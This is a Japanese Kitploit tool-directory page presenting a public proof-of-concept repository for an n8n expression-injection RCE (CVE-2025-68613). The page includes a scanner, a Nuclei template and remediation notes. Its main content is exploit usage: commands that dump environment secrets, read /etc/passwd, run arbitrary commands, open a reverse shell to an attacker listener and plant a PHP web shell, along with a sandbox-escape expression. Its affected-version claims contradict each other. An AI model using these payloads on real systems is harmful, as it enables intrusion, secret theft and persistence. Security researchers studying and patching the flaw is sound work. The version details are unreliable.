Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-68613-POC — CVE-2025-68613 のパブリック PoC + スキャナとリサーチ: n8n ワークフローオートメーションにおける式インジェクションによる重大な RCE (CVSS 10.0)。検出ツール、完全なエクスプロイト、および修復ガイダンスが含まれます。 | Kitploit
ツール/GitHubGitHub/thestingr/cve-2025-68613-poc
偵察脆弱性スキャナー脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト論文と研究学習と教育レッドチーミングペイロード開発
26219ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
thestingr/cve-2025-68613-poc

CVE-2025-68613-POC

CVE-2025-68613 のパブリック PoC + スキャナとリサーチ: n8n ワークフローオートメーションにおける式インジェクションによる重大な RCE (CVSS 10.0)。検出ツール、完全なエクスプロイト、および修復ガイダンスが含まれます。

リポジトリを見る

🚨 CVE-2025-68613: n8n の重大な RCE 脆弱性

Language: Python CVSS Score: 10.0 Critical Exploit Status: Proof of Concept Available CVE Status: CVE-2025-68613 Disclosed Version: v1.0.2 Target Platform: n8n

CVE-2025-68613 PoC - TechSquad RedTeam

目次

  1. 概要
  2. n8n とは?
  3. 脆弱性の基本
  4. 技術的詳細
  5. 影響を受けるバージョン
  6. 悪用の仕組み
  7. 実際の影響
  8. 検出方法
  9. 修復と緩和策
  10. リソースと参考情報

概要

CVE-2025-68613 は、人気のオープンソースワークフロー自動化プラットフォームである n8n で発見された 重大なリモートコード実行 (RCE) 脆弱性です。この脆弱性により、認証済みユーザーがサーバー上で任意のコードを実行でき、システム全体が侵害される可能性があります。

基本情報

  • CVE ID: CVE-2025-68613
  • CVSS スコア: 9.9 - 10.0 (緊急)
  • 脆弱性の種類: 式注入 → リモートコード実行
  • CWE: CWE-913 (動的に管理されるコードリソースの不適切な制御)
  • 攻撃経路: ネットワーク
  • 認証要件: あり (低権限 - 管理者アクセスは不要) |- ステータス: PoC が利用可能 (v1.121.0 で動作確認済み)

n8n とは?

n8n はオープンソースのワークフロー自動化プラットフォームであり、ユーザーは以下のことが可能です:

  • さまざまな API、データベース、サービスを接続する
  • 反復的なビジネスプロセスを自動化する
  • 高度なコーディングを必要とせずに複雑なワークフローを作成する
  • オンプレミスまたはクラウドにデプロイする

n8n が重要なインフラである理由

組織は n8n を以下の目的で使用します:

  • データベースとクラウドサービスを統合する
  • データ処理パイプラインを自動化する
  • CRM、ERP、内部システムを接続する
  • 機密データと API 資格情報を管理する

IT インフラにおけるこの中心的な役割により、脆弱性は特に危険です。攻撃者にネットワーク全体や機密データへのアクセスを提供する可能性があるためです。


このリポジトリのツール

このリポジトリには、脆弱性の検出と悪用テストのためのすぐに使えるツールが含まれています:

1. スキャナ: cve-2025-68613-scanner.py

目的: 脆弱な n8n インスタンスを悪用しない安全な検出

特徴:

  • HTTP 応答からの受動的なバージョン検出
  • 認証不要
  • ペイロードを実行しない
  • 複数の一般的なパスをチェック (/, /rest/settings, /healthz, /api/v1/health)
  • 許可を得たセキュリティ評価に安全

使用方法:```bash python3 cve-2025-68613-scanner.py -u http://target:5678

**Output**:
- 終了コード 0: 脆弱性なし
- 終了コード 1: バージョン特定不能(パッチ適用済みまたは非表示の可能性)
- 終了コード 2: 脆弱なバージョンを検出

### 2. Nuclei テンプレート: `CVE-2025-68613.yaml`
**目的**: 自動的な脆弱性検出と基本的な式評価テスト

**機能**:
- 有効な認証トークンが必要です
- 式インジェクションの実行可能性をテストします
- Node.js のグローバルコンテキスト(process.platform)の読み取りを試みます
- RCE ベクターを検証するテストワークフローを作成します
- CVSS 10.0 Critical の重大度分類

**使用法**:```bash
# Single target with known token
nuclei -t CVE-2025-68613.yaml -u http://target:5678 -v

# Multiple targets
nuclei -t CVE-2025-68613.yaml -l targets.txt

3. 完全なエクスプロイト: exploit_cve-2025-68613.py

目的: 複数の攻撃ペイロードを備えた完全な概念実証エクスプロイト

特徴:

  • 完全な認証処理
  • 複数のエクスプロイトペイロード:
    • info: システム情報を収集(OS、アーキテクチャ、Node.jsバージョン、現在のユーザー)
    • cmd: 任意のシステムコマンドを実行
    • env: すべての環境変数を抽出(認証情報、APIキー、シークレットを露呈)
    • read: ファイルシステムから機密ファイルを読み取り(SSHキー、設定ファイルなど)
    • write: ファイルシステムにファイルを書き込み(永続化、バックドアなど)
    • revshell: 対話型アクセスのためのリバースシェル接続を確立
  • 自動ワークフロークリーンアップ
  • エラーハンドリングとステータス報告

要件:

  • 有効なn8nユーザー資格情報(メールアドレス/パスワード)
  • Python 3.6+ と requests ライブラリ
  • ターゲットのn8nインスタンスへのネットワークアクセス

インストール:```bash pip install requests chmod +x exploit_cve-2025-68613.py

**使用例**:```bash
# Gather system information
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload info

# Execute system command (whoami)
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload cmd --command "whoami"

# Extract all environment variables (credentials, API keys)
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload env

# Read sensitive files
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload read --file "/etc/passwd"

# Establish reverse shell (requires netcat listener)
# On attacker machine: nc -lvnp 4444
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444

# Write a web shell for persistence
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e [email protected] -p password --payload write \  
  --file "/tmp/shell.php" --content '<?php system($_GET["cmd"]); ?>'

しくみ:

  1. 提供された認証情報を使用して n8n に認証する
  2. 式インジェクションペイロードを含む悪意のあるワークフローを作成する
  3. this.constructor.constructor() を使用して式サンドボックスを突破する
  4. process.platform やその他の Node.js API を介してペイロードを実行する
  5. ワークフロー実行から結果を取得する
  6. テストワークフローを削除して後始末する

終了コード:

  • 0: 悪用に成功
  • 1: 認証または悪用に失敗

脆弱性の基本

問題は何か?

簡単に言うと: n8n では、ユーザーがワークフロー内で式を使用してデータを動的に処理できます。しかし、これらの式は適切なサンドボックス化なしに評価されるため、攻撃者は意図された実行コンテキストを突破して、サーバー上で任意のコードを実行できます。

核心となる問題

n8n でワークフローを作成するとき、「式」を使用してデータを操作できます。これらの式は制限された環境で実行されることになっています。しかし、この脆弱性により、これらの式が基盤となるシステムにアクセスでき、攻撃者は以下を行うことができます:

  1. システムコマンドを実行する
  2. サーバー上のファイルを読み書きする
  3. 環境変数(APIキー、パスワード、シークレット)を盗む
  4. データを変更または削除する
  5. 長期的なアクセスのために永続化を確立する

なぜこれほど危険なのか

  • 参入障壁が低い: ユーザーログインのみが必要(特別な管理者権限は不要)
  • 適用範囲が広い: 多くの組織が非技術系ユーザーにワークフロー作成を許可している
  • 影響が大きい: n8n プロセスのすべての権限で実行される
  • データアクセス: n8n がアクセスできるすべてのデータ(データベース、API、認証情報)にアクセスできる
  • ネットワーク上の位置: n8n は多くの場合、重要なインフラストラクチャの中心に位置するため、横移動が可能になる

技術的詳細

脆弱性の仕組み

ステップ 1: ワークフロー式の評価

ユーザーが n8n でワークフローを作成すると、式を使用してデータを処理できます:``` Input: User creates a workflow with an expression n8n Expression Engine: Evaluates the expression Expected Output: Processed data Actual Output (Vulnerable): Expression execution context not isolated from runtime

#### ステップ2: 式インジェクション
攻撃者は、意図されたサンドボックスから脱出する悪意のある式を作成します:```javascript
// Example: Malicious expression in workflow
${require('child_process').execSync('id')}

ステップ 3: コード実行

式は適切な分離なしに評価され、攻撃者は以下のことが可能になります:

  • システム関数の呼び出し
  • シェルコマンドの実行
  • ファイルシステムへのアクセス
  • 環境変数の読み取り

根本原因

この脆弱性は、式評価エンジンにおける不十分なサンドボックス化に起因します。n8nチームは、以下のようなコンテキストで式を評価していました:

  • require() または類似のモジュールロード関数へのアクセスを許可していた
  • システムAPIへのアクセスを適切に制限していなかった
  • 式の構文を検証またはフィルタリングしていなかった
  • プロトタイプ汚染攻撃を防いでいなかった
  • 実行環境を基盤となるNode.jsランタイムから分離していなかった

コード実行パス```

User Input (Workflow Expression) ↓ Expression Parser ↓ Evaluation Engine (VULNERABLE - Not Sandboxed) ↓ Direct Access to Node.js Runtime ↓ System Command Execution / File Access / Credential Theft

---

## 影響を受けるバージョン

### 脆弱性のある範囲

**0.211.0** 以降のすべての n8n バージョンで、以下のバージョンまでが脆弱です:
- `0.211.0` → `1.120.3`
- `1.121.0`

### パッチ適用済みバージョン

この脆弱性は以下で修正されています:
- ✅ `1.120.4` および 1.120.x ブランチのそれ以降
- ✅ `1.121.1` および 1.121.x ブランチのそれ以降
- ✅ `1.122.0` およびすべての新しいバージョン

### 自分のバージョンを確認する方法```bash
# If n8n is running
curl http://your-n8n-instance:5678/ | grep -i "version"

# Or check the admin panel
# Go to Settings → About → Version

テスト済みバージョンと互換性

動作確認済み

  • n8n v1.121.0: ✅ 完全に悪用可能(RCE確認済み、式インジェクション動作確認済み)
  • n8n v0.211.0 - v1.120.3: ✅ NVDによる脆弱性の範囲内(個別にはテスト未実施)

既知の問題

  • REST実行の制限: /rest/workflows/{id}/run エンドポイントは v1.121.0 で HTTP 500 エラーを返します
    • 回避策: 式インジェクションは完全に動作し、RCEは次の方法で確認済み:
      1. UIの「テストステップ」ボタンの手動クリック(動作実証済み)
      2. ワークフロー出力の取得
    • これはAPIの制限であり、エクスプロイトのバグではありません

未テスト

  • n8n v0.212.0+: 文書化された脆弱性の範囲外であり、修正済みの可能性が高い(GitHub issue #1 を参照)
  • Windows Serverデプロイ: Windows固有環境でのテストデータは限定的

バージョンサポートに関する声明

このエクスプロイトは、NVDに文書化された脆弱性の範囲に対して動作するように設計されています:

  • 脆弱性確認済み: 0.211.0 から 1.120.3、および 1.121.0
  • 修正済みバージョン: 1.120.4、1.121.1、1.122.0 以降

この範囲外のバージョンに対してテストする場合、成功は保証されません。


悪用の仕組み

攻撃者は何ができるのか?

認証されたユーザー(または有効な認証情報を持つ攻撃者)がこの脆弱性を悪用すると、次のことが可能です:

ツールをダウンロード